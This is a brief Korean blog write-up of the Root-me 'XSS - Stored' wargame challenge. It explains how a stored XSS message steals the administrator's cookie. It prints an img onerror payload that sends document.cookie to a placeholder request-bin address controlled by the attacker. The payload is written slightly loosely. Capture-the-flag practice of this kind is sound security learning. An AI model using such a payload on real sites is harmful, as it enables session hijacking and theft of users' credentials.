-
<Root-me> XSS - Stored 1Wargame/Root-me = Web - Client 2022. 1. 4. 14:55
관리자의 쿠키를 탈취하라고 한다.
XSS Stored 공격은 웹 서버에 저장되었다가 실행된다.
request bin과 같은 HTTP 요청을 받을 수 있는 사이트를 이용해
Message에 <img src=x onerror="{request bin 주소}"+document.cookie></img>를 입력하면
사진 파일이 올라가게 되는데, 이를 관리자가 보게되면 자바스크립트 코드에 의해 관리자의 쿠키를 request bin 주소로 요청하게 된다.
ADMIN_COOKIE라는 키를 가진 관리자의 쿠키를 획득할 수 있다.
'Wargame > Root-me = Web - Client' 카테고리의 다른 글
XSS DOM Based - Introduction (0) 2022.11.08 <Root-me> Install files (0) 2022.01.05 <Root-me> CSRF - 0 protection (0) 2021.12.24 <Root-me> CSP Bypass - Inline code (0) 2021.12.22 <Root-me> Javascript - Obfuscation 3 (0) 2021.12.20